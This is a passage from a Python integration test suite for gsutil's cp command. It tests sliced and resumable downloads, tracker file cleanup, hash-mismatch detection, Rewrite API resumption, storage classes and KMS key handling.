contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# No tracker files should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Perform the entire download, without resuming.
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume(self):
"""Tests that sliced object download is resumable."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_partial_resume(self):
"""Test sliced download resumability when some components are finished."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltOneComponentCopyCallbackHandler(5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Download already complete', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume_content_differs(self):
"""Tests differing file contents are detected by sliced downloads."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile(contents=b'')
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
with open(fpath + '_.gstmp', 'r+b') as f:
f.write(b'altered file contents')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Resuming download', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
self.assertIn('HashMismatchException: crc32c', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Temporary file should have been deleted due to hash mismatch.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Final file should not exist.
self.assertFalse(os.path.isfile(fpath))
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_component_size_changed(self):
"""Tests sliced download doesn't break when the boto config changes.
If the number of components used changes cross-process, the download should
be restarted.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 4)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 2)),
('GSUtil', 'sliced_object_download_max_components', '2')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Sliced download tracker file doesn\'t match ', stderr)
self.assertIn('Restarting download from scratch', stderr)
self.assertNotIn('Resuming download', stderr)
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_disabled_cross_process(self):
"""Tests temporary files are not orphaned if sliced download is disabled.
Specifically, temporary files should be deleted when the corresponding
non-sliced download is completed.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
# Disable sliced downloads by increasing the threshold
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should have been deleted.
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_start_over_http_error(self):
for start_over_error in (
403, # If user doesn't have storage.buckets.get access to dest bucket.
404, # If the dest bucket exists, but the dest object does not.
410): # If the service tells us to restart the upload from scratch.
self.start_over_error_test_helper(start_over_error)
def start_over_error_test_helper(self, http_error_num):
bucket_uri = self.CreateBucket()
# The object contents need to be fairly large to avoid the race condition
# where the contents finish uploading before we artifically halt the copy.
rand_chars = get_random_ascii_chars(size=(ONE_MIB * 4))
fpath = self.CreateTempFile(contents=rand_chars)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
if self.test_api == ApiSelector.JSON:
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(_JSONForceHTTPErrorCopyCallbackHandler(5, 404)))
elif self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_XMLResumableUploadStartOverCopyCallbackHandler(5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True)
self.assertIn('Restarting upload of', stderr)
def test_cp_minus_c(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.RunGsUtil([
'cp', '-c',
suri(bucket_uri) + '/foo2',
suri(object_uri),
suri(bucket_uri) + '/dir/'
],
expected_status=1)
self.RunGsUtil(['stat', '%s/dir/foo' % suri(bucket_uri)])
def test_rewrite_cp(self):
"""Tests the JSON Rewrite API."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar')
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type)
dst_obj_metadata = apitools_messages.Object(
bucket=src_obj_metadata.bucket,
name=self.MakeTempName('object'),
contentType=src_obj_metadata.contentType)
gsutil_api.CopyObject(src_obj_metadata, dst_obj_metadata)
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
def test_rewrite_cp_resume(self):
"""Tests the JSON Rewrite API, breaking and resuming via a tracker file."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file should be left over.
self.assertTrue(os.path.exists(tracker_file_name))
# Now resume. Callback ensures we didn't start over.
gsutil_api.CopyObject(
src_obj_metadata,
dst_obj_metadata,
progress_callback=EnsureRewriteResumeCallbackHandler(ONE_MIB *
2).call,
max_bytes_per_call=ONE_MIB)
# Copy completed; tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_source_changed(self):
"""Tests that Rewrite starts over when the source object has changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Overwrite the original object.
object_uri2 = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar',
prefer_json_api=True)
key2 = object_uri2.get_key()
src_obj_metadata2 = apitools_messages.Object(
name=key2.name,
bucket=key2.bucket.name,
contentType=key2.content_type,
etag=key2.etag.strip('"\''))
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the new object.
gsutil_api.CopyObject(src_obj_metadata2,
dst_obj_metadata,
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata2.bucket,
src_obj_metadata2.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_command_changed(self):
"""Tests that Rewrite starts over when the arguments changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
# need 2 response from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='private',
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the same object but with different call parameters.
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='public-read',
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
new_obj_metadata = gsutil_api.GetObjectMetadata(
dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['acl', 'customerEncryption', 'md5Hash'])
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
new_obj_metadata.md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
# New object should have a public-read ACL from the second command.
found_public_acl = False
for acl_entry in new_obj_metadata.acl:
if acl_entry.entity == 'allUsers':
found_public_acl = True
self.assertTrue(found_public_acl,
'New object was not written with a public ACL.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@unittest.skipUnless(UsingCrcmodExtension(), 'Test requires fast crcmod.')
def test_cp_preserve_posix_bucket_to_dir_no_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically tests combinations of POSIX attributes in metadata that will
pass validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
TestCpMvPOSIXBucketToLocalNoErrors(self, bucket_uri, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preserve_posix_bucket_to_dir_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically, combinations of POSIX attributes in metadata that will fail
validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
obj = self.CreateObject(bucket_uri=bucket_uri,
object_name='obj',
contents=b'obj')
TestCpMvPOSIXBucketToLocalErrors(self, bucket_uri, obj, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preseve_posix_dir_to_bucket_no_errors(self):
"""Tests use of the -P flag with cp from a local dir to a bucket."""
bucket_uri = self.CreateBucket()
TestCpMvPOSIXLocalToBucketNoErrors(self, bucket_uri, is_cp=True)
def test_cp_minus_s_to_non_cloud_dest_fails(self):
"""Test that cp -s operations to a non-cloud destination are prevented."""
local_file = self.CreateTempFile(contents=b'foo')
dest_dir = self.CreateTempDir()
stderr = self.RunGsUtil(['cp', '-s', 'standard', local_file, dest_dir],
expected_status=1,
return_stderr=True)
self.assertIn('Cannot specify storage class for a non-cloud destination:',
stderr)
# TODO: Remove @skip annotation from this test once we upgrade to the Boto
# version that parses the storage class header for HEAD Object responses.
@SkipForXML('Need Boto version > 2.46.1')
def test_cp_specify_nondefault_storage_class(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
object2_suri = suri(object_uri) + 'bar'
# Specify storage class name as mixed case here to ensure that it
# gets normalized to uppercase (S3 would return an error otherwise), and
# that using the normalized case is accepted by each API.
nondefault_storage_class = {
's3': 'Standard_iA',
'gs': 'durable_REDUCED_availability'
}
storage_class = nondefault_storage_class[self.default_provider]
self.RunGsUtil(['cp', '-s', storage_class, suri(object_uri), object2_suri])
stdout = self.RunGsUtil(['stat', object2_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+%s' % storage_class,
flags=re.IGNORECASE)
@SkipForS3('Test uses gs-specific storage classes.')
def test_cp_sets_correct_dest_storage_class(self):
"""Tests that object storage class is set correctly with and without -s."""
# Use a non-default storage class as the default for the bucket.
bucket_uri = self.CreateBucket(storage_class='nearline')
# Ensure storage class is set correctly for a local-to-cloud copy.
local_fname = 'foo-orig'
local_fpath = self.CreateTempFile(contents=b'foo', file_name=local_fname)
foo_cloud_suri = suri(bucket_uri) + '/' + local_fname
self.RunGsUtil(['cp', '-s', 'standard', local_fpath, foo_cloud_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_cloud_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when no
# destination storage class is specified.
foo_nl_suri = suri(bucket_uri) + '/foo-nl'
self.RunGsUtil(['cp', foo_cloud_suri, foo_nl_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_nl_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+NEARLINE',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when a
# non-bucket-default storage class is specified.
foo_std_suri = suri(bucket_uri) + '/foo-std'
self.RunGsUtil(['cp', '-s', 'standard', foo_nl_suri, foo_std_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_std_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
def authorize_project_to_use_testing_kms_key(
self, key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME):
# Make sure our keyRing and cryptoKey exist.
keyring_fqn = self.kms_api.CreateKeyRing(
PopulateProjectId(None),
testcase.KmsTestingResources.KEYRING_NAME,
location=testcase.KmsTestingResources.KEYRING_LOCATION)
key_fqn = self.kms_api.CreateCryptoKey(keyring_fqn, key_name)
# Make sure that the service account for our default project is authorized
# to use our test KMS key.
self.RunGsUtil(['kms', 'authorize', '-k', key_fqn])
return key_fqn
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_no_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key_fqn = self.authorize_project_to_use_testing_kms_key()
# Create the unencrypted object, then copy it, specifying a KMS key for the
# new object.
obj_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo')
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(
['cp', suri(obj_uri),
'%s/%s' % (suri(bucket_uri), obj2_name)])
# Make sure the new object is encrypted with the specified KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK('%s/%s' % (suri(bucket_uri), obj2_name),
key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_local_file(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_works_with_resumable_upload(self):
resumable_threshold = 1024 * 1024 # 1M
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * resumable_threshold)
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'resumable_threshold',
str(resumable_threshold))]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_diff_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
key2_fqn = self.authorize_project_to_use_testing_kms_key(
key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME2)
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, specifying a different key to be used.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key2_fqn)]):
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has the different key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj2_suri, key2_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
@SkipForXML('Copying KMS-encrypted objects prohibited with XML API')
def test_kms_key_not_applied_to_nonkms_dst_obj_from_src_with_kms_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, not specifying any KMS key.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has no KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUnencrypted(obj2_suri)
@unittest.skipUnless(
IS_WINDOWS,
'Only Windows paths need to be normalized to use backslashes instead of '
'forward slashes.')
def test_windows_path_with_back_and_forward_slash_is_normalized(self):
# Prior to this test and its corresponding fix, running
# `gsutil cp dir/./file gs://bucket` would result in an object whose name
# was "dir/./file", rather than just "file", as Windows tried to split on
# the path component separator "\" intead of "/".
tmp_dir = self.CreateTempDir()
self.CreateTempFile(tmpdir=tmp_dir, file_name='obj1', contents=b'foo')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '%s\\./obj1' % tmp_dir, suri(bucket_uri)])
# If the destination path was not created correctly, this stat call should
# fail with a non-zero exit code because the specified object won't exist.
self.RunGsUtil(['stat', '%s/obj1' % suri(bucket_uri)])
def test_cp_minus_m_streaming_upload(self):
"""Tests that cp -m - anything is disallowed."""
stderr = self.RunGsUtil(['-m', 'cp', '-', 'file'],
return_stderr=True,
expected_status=1)
self.assertIn(
'CommandException: Cannot upload from a stream when using gsutil -m',
stderr)
@SequentialAndParallelTransfer
def test_cp_overwrites_existing_destination(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(['cp', suri(key_uri), fpath], return_stderr=True)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
@SequentialAndParallelTransfer
def test_downloads_are_reliable_with_more_than_one_gsutil_instance(self):
test_file_count = 10
temporary_directory = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=test_file_count)
